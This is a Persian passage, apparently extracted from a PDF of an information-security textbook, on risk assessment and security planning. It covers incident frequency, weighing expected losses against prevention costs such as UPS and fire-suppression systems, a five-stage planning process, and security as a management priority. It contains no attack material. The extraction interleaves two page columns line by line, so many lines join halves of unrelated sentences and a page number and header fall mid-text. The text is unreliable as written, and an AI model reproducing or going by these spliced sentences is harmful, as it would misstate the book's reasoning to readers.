‫ﺯﻳﺎﻧﻬﺎﻱ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﻣﺤﺘﻤﻞ ﻭ ﺗﻮﺟـﻪ ﻛﻤﺘـﺮ ﺑـﻪ ﻣـﻮﺍﺭﺩ ﻧـﺎﺩﺭ ﻭ‬ ‫ﺍﮔﺮ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻳﺪ ﺣﺎﺩﺛـﻪﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳﻜﺒـﺎﺭ ﺩﺭ ﺳـﺎﻝ ﺭﺥ ﺩﻫـﺪ‪،‬‬
‫ﻛﻢﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤﻴﻄﻬﺎ ﺍﺣﺘﻤﺎﻝ ﻭﻗـﻮﻉ ﻣـﻮﺍﺭﺩﻱ‬ ‫ﺗﻌﺪﺍﺩ ﺩﻓﻌﺎﺕ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺩﺭ ﻃﻮﻝ ﻳﻜﺴﺎﻝ ﺛﺒﺖ ﻛﻨﻴـﺪ‪ .‬ﻣـﺜ ﹰ‬
‫ﻼ ﺍﮔـﺮ‬
‫ﻧﻈﻴﺮ ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﭘﺮﺳﻨﻞ ﻛﻠﻴﺪﻱ ﺑـﺴﻴﺎﺭ ﺑـﻴﺶ‬ ‫ﻭﻗﻮﻉ ﺯﻟﺰﻟﻪ ﺭﺍ ﺩﺭ ﻫﺮ ‪ ۱۰۰‬ﺳﺎﻝ ﻳﻜﺒﺎﺭ ﭘﻴﺶﺑﻴﻨـﻲ ﻛﻨﻴـﺪ‪ ،‬ﻃﺒـﻖ‬
‫ﺍﺯ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺷﺒﻜﻪ ﻣﻲﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺑـﺎ ﻛﻤـﺎﻝ ﺗﻌﺠـﺐ‬ ‫ﺁﻧﭽﻪ ﮔﻔﺘﻪ ﺷﺪ ﺩﺭ ﻓﻬﺮﺳﺖ ﺷﻤﺎ ﻣﻲﺷـﻮﺩ ‪%۱‬؛ ﺍﮔـﺮ ﺍﻣـﺎ ﺍﻧﺘﻈـﺎﺭ‬
‫ﺍﻳﻦ ﻧﻔﻮﺫﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺟـﻪ ﻣـﺪﻳﺮﺍﻥ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ‬ ‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻃﻲ ﻣﺎﻩ ﺁﻳﻨﺪﻩ ﺳﻪ ﺍﺷﻜﺎﻝ ﺟﺪﻱ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ‬
‫ﻗﺴﻤﺖ ﻋﻤﺪﻩﺍﻱ ﺍﺯ ﺑﻮﺩﺟﻪ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺍﻳـﻦ‬ ‫‪ Microsoft IIS‬ﻛﺸﻒ ﺷﻮﺩ‪ ،‬ﺧﻮﺍﻫﺪ ﺷﺪ ‪.%۳۶۰۰‬‬
‫ﻋﻤﻠﻜﺮﺩ ﺍﺯ ﻟﺤﺎﻅ ﻫﺰﻳﻨـﻪ ﺍﺛـﺮﺑﺨﺶ ﻧﻴـﺴﺖ ﻭ ﺑـﺎﻻﺗﺮﻳﻦ ﺳـﻄﺢ‬
‫ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻛﻞ ﺳﻴﺴﺘﻢ ﻓﺮﺍﻫﻢ ﻧﻤـﻲﻛﻨـﺪ‪ .‬ﺑـﺮﺍﻱ ﺗﺠـﺴﻢ‬
‫ﺳﺮﺍﻧﺠﺎﻡ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﻫـﺮ ﻧـﻮﻉ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ‬
‫ﺍﻗﺪﺍﻣﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ ،‬ﺁﻧﭽﻪ ﺑﺮﺍﻱ ﭘﻴـﺸﮕﻴﺮﻱ ﻭ ﺗـﺮﻣﻴﻢ‬
‫ﻻ‬
‫ﻕ ﻟﺤﻈﻪﺍﻱ ﺍﺣﺘﻤـﺎ ﹰ‬‫ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻫﺰﻳﻨﺔ ﻗﻄ ﹺﻊ ﺑﺮ ﹺ‬
‫ﻫﺮ ﺭﺧﺪﺍﺩ ﺟﻤﻊﺁﻭﺭﻱ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻭﻟﻮﻳﺖ‪ ،‬ﻃﺒﻘﻪﺑﻨـﺪﻱ‬
‫ﻋﺒﺎﺭﺕ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺍﺯ ﻫﺰﻳﻨﺔ ﺯﻣﺎﻥ ﺑﻴﻜﺎﺭﻱ ﭘﺮﺳﻨﻞ ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﺰﻳﻨﺔ ﺗـﺮﻣﻴﻢ ﺭﺍ ﺑـﻪ ﻣﻴـﺎﻧﮕﻴﻦ ﺯﻳـﺎﻥ‬
‫ﻣﺠﺪﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ؛ ﺍﻣﺎ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺁﻥ ﺑﺮﺍﺑﺮ ﻫﺰﻳﻨﺔ ﺧﺮﻳـﺪ ﻭ‬
‫ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺿﺎﻓﻪ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺩﺭ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺭﺧـﺪﺍﺩ ﺿـﺮﺏ‬
‫ﻧﺼﺐ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ UPS‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺁﻧﮕﺎﻩ ﻧﺘـﺎﻳﺞ ﺣﺎﺻـﻠﻪ ﺭﺍ ﺑـﺎ ﻫﺰﻳﻨـﺔ ﺳـﺎﻻﻧﺔ ﭘﻴـﺸﮕﻴﺮﻱ‬
‫ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻫﺰﻳﻨﻪﻫﺎ ﻛﻤﺘﺮ ﺍﺯ ﻫﺰﻳﻨﺔ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﻣﺨﺎﻃﺮﻩ‬ ‫ﻫﺰﻳﻨﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﻋﻤﺮ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ‪ ،‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻱ‬
‫ﺍﺳﺖ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﺟـﻮﺩ ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻛـﺎﻓﻲ‬ ‫ﻣﻨﺎﺳﺐ ﻣﺴﺘﻬﻠﻚ ﺷﻮﻧﺪ‪ .‬ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻳﻦ ﻫﺰﻳﻨﻪﻫﺎ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺍﺳــﺘﺮﺍﺗﮋﻱ ﭘﻴــﺸﮕﻴﺮﻱ ﺭﺍ ﺩﺭ ﭘــﻴﺶ ﺑﮕﻴﺮﻳــﺪ؛ ﺍﻣــﺎ ﺍﮔــﺮ ﻫﺰﻳﻨــﺔ‬ ‫ﻫﺰﻳﻨﻪﻫﺎ ﻭ ﺍﻋﺘﺒﺎﺭﺍﺕ ﺩﻳﮕﺮﻱ ﺭﺍ ﻣﺸﺨﺺ ﻛﻨﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴـﺰ ﺑﺎﻳـﺪ‬
‫ﭘﻴﺸﮕﻴﺮﻱ ﺑﻴﺶ ﺍﺯ ﻫﺰﻳﻨﺔ ﺁﺳﻴﺒﻬﺎ ﻭ ﺗﺮﻣﻴ ﹺﻢ ﺑﻌﺪ ﺍﺯ ﻭﻗـﻮﻉ ﺭﺧـﺪﺍﺩ‬ ‫ﻖ ﺑﻬﺘـﺮ‬‫ﻼ ﻧﺼﺐ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻃﻔﺎﺀ ﺣﺮﻳ ﹺ‬ ‫ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺍﺳﺖ‪ ،‬ﺗﺎ ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﻫﻴﭻ ﺍﻗﺪﺍﻣﻲ ﻧﻜﻨﻴﺪ‪.‬‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺣﻖ ﺑﻴﻤﺔ ﺁﺗـﺶﺳـﻮﺯﻱ ﺭﺍ ﻛـﺎﻫﺶ ﺩﻫـﺪ ﻭ ﺑـﻪ ﻋﻠـﺖ‬
‫ﺍﺳﺘﻬﻼﻙ ﺳﺮﻣﺎﻳﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺰﻳﺖ ﻣﺎﻟﻴـﺎﺗﻲ ﺍﻳﺠـﺎﺩ ﻛﻨـﺪ؛ ﺍﻣـﺎ‬
‫ﺻﺮﻑ ﭘﻮﻝ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺍﻃﻔﺎﺀ ﺣﺮﻳﻖ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎﺳﺖ ﻛـﻪ ﺁﻥ‬
‫ﭘﻮﻝ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺍﻫﺪﺍﻑ ﻧﻈﻴﺮ ﺁﻣﻮﺯﺵ ﻛﺎﺭﻛﻨـﺎﻥ ﻳـﺎ ﺣﺘـﻲ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﻴﺴﺖ‪.‬‬

‫ﺟﻤﻌﺒﻨﺪﻱ ﻧﺘﺎﻳﺞ‬
‫ﺩﺭ ﺑﺨﺶ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ ﺑﺎﻳﺪ ﻳﻚ ﺟﺪﻭﻝ ﭼﻨﺪ ﺳﺘﻮﻧﻲ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎ‪،‬‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺯﻳﺎﻧﻬﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ‪ .‬ﺑـﺮﺍﻱ ﻫـﺮ ﺯﻳـﺎﻥ‬
‫ﺑﺎﻳﺪ ﺍﺣﺘﻤﺎﻝ‪ ،‬ﺧﺴﺎﺭﺕ ﭘﻴﺶﺑﻴﻨﻲﺷﺪﻩ ﻭ ﻣﻘـﺪﺍﺭ ﭘـﻮﻝ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ‬
‫‪١٤٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﭘﻨﺞ ﻣﺮﺣﻠﺔ ﻣﺠﺰﺍ ﺗﻘﺴﻴﻢ ﻛﺮﺩ‪:‬‬


‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬ ‫‪.۱‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺍﻧﺘﺨﺎﺏ ﺑﻬﺘﺮﻳﻦ ﺷﻴﻮﻩﻫﺎ‬ ‫‪.۲‬‬
‫ﺍﻳﺠﺎﺩ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻧﻌﻜﺎﺱ ﻧﻴﺎﺯﻫﺎ‬ ‫‪.۳‬‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻨﻴﺖ‬ ‫‪.۴‬‬
‫ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﺑﺮﺭﺳﻲ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﻭﻗﺎﻳﻊ‬ ‫‪.۵‬‬ ‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺩﻭ ﺍﺻﻞ ﺍﺳﺎﺳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺩﺭ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ ﺍﺛـﺮﺑﺨﺶ‬
‫ﺳﻴﺎﺳﺖ ﻭ ﺍﻣﻨﻴﺖ ﺗﺄﺛﻴﺮ ﺿﻤﻨﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ‪:‬‬ ‫ﻛﻠﻴﺎﺕ‬
‫ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺍﺯ ﺑـﺎﻻ ﺑـﻪ‬ ‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺩﻓـﺎﻉ‬
‫ﭘﺎﺋﻴﻦ ﮔﺴﺘﺮﺵ ﻳﺎﺑـﺪ‪ .‬ﻧﮕﺮﺍﻧﻴﻬـﺎ ﻭ ﺁﮔـﺎﻫﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻣـﺴﺎﺋﻞ‬ ‫ﻣﺆﺛﺮ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﻗﺒﻞ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﺑﺤـﺚ‬
‫ﺍﻣﻨﻴﺘﻲ ﺣﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﺁﻧﻬـﺎ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﮔـﺴﺘﺮﺓ‬ ‫ﺷﺪ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻭ ﺟﺰﺋﻴﺎﺕ ﻓﺮﺁﻳﻨﺪ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺳﺎﺯﻣﺎﻥ ﻳﻚ ﻓﺮﻫﻨﮓ ﻣﺆﺛﺮ ﺍﻣﻨﻴﺘﻲ ﺍﻳﺠﺎﺩ ﻭ ﺁﻧﺮﺍ ﺣﻔﻆ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭ‬
‫ﻋﻮﺽ ﺍﻳﻦ ﻣﺪﻳﺮﺍﻥ ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﻨﻴـﺖ ﺑﻌﻨـﻮﺍﻥ‬ ‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻓﻨﻲ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻣﻮﺿﻮﻋﻲ ﻣﻬﻢ ﺑﻨﮕﺮﻧﺪ ﻭ ﺿﻮﺍﺑﻂ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﻧﺮﺍ ﻧﻈﻴﺮ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ‬ ‫ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﻣﻨﻴﺖ‬
‫ﺑﭙﺬﻳﺮﻧﺪ ﻭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﺳﺎﺳﹰﺎ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻓﻨـﻲ ﺑـﺮﺍﻱ‬
‫ﺍﻣﻨﻴﺖ ﻣﺆﺛﺮ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻣﻌﻨﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬ ‫ﻣــﺸﻜﻼﺕ ﻏﻴﺮﻓﻨــﻲ ﺍﺳــﺖ‪ .‬ﺯﻣــﺎﻥ‪ ،‬ﭘــﻮﻝ ﻭ ﺗــﻼﺵ ﺯﻳــﺎﺩﻱ ﺭﺍ‬
‫ﺍﮔﺮﭼﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻨﺎﺑﻊ ﺩﻳﮕﺮ ﻫـﻢ ﻣﻬـﻢ ﺍﺳـﺖ ﺍﻣـﺎ ﺿـﺮﺭﻫﺎﻱ‬ ‫ﻣﻲﺗﻮﺍﻥ ﺑـﺮﺍﻱ ﺍﻳﻤـﻦ ﻛـﺮﺩﻥ ﺭﺍﻳﺎﻧـﻪ ﺻـﺮﻑ ﻛـﺮﺩ‪ ،‬ﺍﻣـﺎ ﻫﺮﮔـﺰ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺗﺨﺮﻳﺐ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﺑﺴﻴﺎﺭ ﺭﺍﺣﺖﺗﺮ ﺍﺯ ﺿـﺮﺭﻫﺎﻱ ﻭﺍﺭﺩﻩ‬ ‫ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﻧﮕﺮﺍﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﭘـﺎﻙﺷـﺪﻥ ﺗـﺼﺎﺩﻓﻲ ﺩﺍﺩﻩﻫـﺎ ﻳـﺎ‬
‫ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻭ ﺟﺒـﺮﺍﻥ ﻫـﺴﺘﻨﺪ‪ .‬ﻛﻠﻴـﺔ ﻃﺮﺣﻬـﺎ‪،‬‬ ‫ﺗﺨﺮﻳﺐ ﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﺭﺍﺣﺖ ﺷﺪ‪ .‬ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻣﺠﻤﻮﻋﺔ‬
‫ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎ ﺑﺎﻳــﺪ ﻣــﻨﻌﻜﺲﻛﻨﻨــﺪﺓ ﻧﻴــﺎﺯ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺍﺯ‬ ‫ﺷﺮﺍﻳﻂ ‪ -‬ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﺣﻮﺍﺩﺙ‪ ،‬ﺍﺷـﺘﺒﺎﻫﺎﺕ‪ ،‬ﺑـﺪﺍﻗﺒﺎﻟﻲ‪،‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻫﺮ ﻗﺎﻟﺐ ﻣﻤﻜﻦ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺍﻧﺤـﺼﺎﺭﻱ ﺍﮔـﺮ‬ ‫ﺁﺏ ﻭ ﻫﻮﺍﻱ ﺑﺪ ﻳﺎ ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﺠﻬﺰ ﻭ ﺑـﺎ ﺍﻧﮕﻴـﺰﻩ ‪ -‬ﻣـﺸﺎﻫﺪﻩ‬
‫ﺑﻪ ﭼﺎﭖ ﺑﺮﺳﻨﺪ ﻳﺎ ﺑﻪ ﻳﻚ ﺩﻓﺘﺮ ﻓﻜـﺲ ﺷـﻮﻧﺪ ﺍﺭﺯﺵ ﺧـﻮﺩ ﺭﺍ ﺍﺯ‬ ‫ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺩﺳﺖ ﻧﻤﻲﺩﻫﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻴـﺰ ﺍﮔـﺮ ﺑﺠـﺎﻱ‬ ‫ﻼ ﻣﻨﻬﺪﻡ ﺷﻮﺩ‪.‬‬‫ﺑﮕﻴﺮﺩ‪ ،‬ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺑﻴﺎﻓﺘﺪ‪ ،‬ﻳﺎ ﺣﺘﻲ ﻛﺎﻣ ﹰ‬
‫ﺍﺭﺳﺎﻝ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻠﻔﻦ ﮔـﺰﺍﺭﺵ‬
‫ﻭﻇﻴﻔﺔ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺘﻲ ﻛﻤﻚ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴـﺮﻱ‬
‫ﺷﺪﻧﺪ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﺍﺭﺯﺵ ﺯﻳـﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ‪ .‬ﺧﻼﺻـﻪ ﺍﻳﻨﻜـﻪ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺯﻣﺎﻥ ﻭ ﻫﺰﻳﻨﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣـﻲﺧﻮﺍﻫـﺪ ﺑـﺮﺍﻱ ﻣـﺴﺌﻠﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺩﺭ‬
‫ﺍﻣﻨﻴﺖ ﺍﺧﺘﺼﺎﺹ ﺩﻫﺪ‪ .‬ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻨﻜﺎﺭ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ‬
‫ﭼﻪ ﻗﺎﻟﺒﻲ ﺑﺎﺷﺪ‪.‬‬
‫ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﺧﻂﻣﺸﻲﻫـﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻨﺎﺳـﺐ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻭ ﺗﻌﺎﺭﻳﻒ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬ ‫ﺍﺳﺖ ﺗﺎ ﺑﻮﺩﺟﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻫﺰﻳﻨﻪ ﺷـﻮﺩ‪ .‬ﺩﺭ ﻧﻬﺎﻳـﺖ‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺠﺎﻱ ﺍﺭﺍﺋﻪ ﻳﻚ ﺗﻌﺮﻳﻒ ﺭﺳﻤﻲ‪ ،‬ﺗﻮﺟـﻪ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ‬ ‫ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪﺍﻱ ﺑﺎﻳﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨـﺪ ﺗـﺎ ﺍﺯ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺭﻭﻳﻜﺮﺩ ﻋﻤﻠﻲ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺍﻧﻮﺍﻉ ﺣﻔﺎﻇﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ‬ ‫ﺻﺤﻴﺢ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ ﺑـﺮﺁﻭﺭﺩﻩﺷـﺪﻥ ﺍﻫـﺪﺍﻑ‬
‫ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺑﻪ ﺑﺤﺚ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ‪.‬‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴﺖ ﻋﻤﻠﻲ ﺑﻴﺶ ﺍﺯ ﺍﻳﻨﻜـﻪ ﻣـﺴﺌﻠﻪﺍﻱ‬
‫ﻓﻨﻲ ﺑﺎﺷﺪ‪ ،‬ﻣﺴﺌﻠﻪﺍﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺍﺳﺖ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻳﻜـﻲ‬
‫ﺍﺯ ﺍﻭﻟﻮﻳﺘﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺳﺎﺯﻣﺎﻥ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﺑـﺴﻴﺎﺭ‬
‫ﻛﻮﭼﻚ ﻛﻪ ﺑﻮﺩﺟﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺻﺮﻑ ﻧﻤﻲﺷـﻮﺩ‪،‬‬
‫ﻣﺪﻳﺮﻳﺖ ﺑﺎﻳﺪ ﻣﺴﺎﺋﻞ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭﻙ ﻛﻨﺪ ﻭ ﺍﺻﻮﻝ ﺍﻭﻟﻴـﺔ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ‪.‬‬
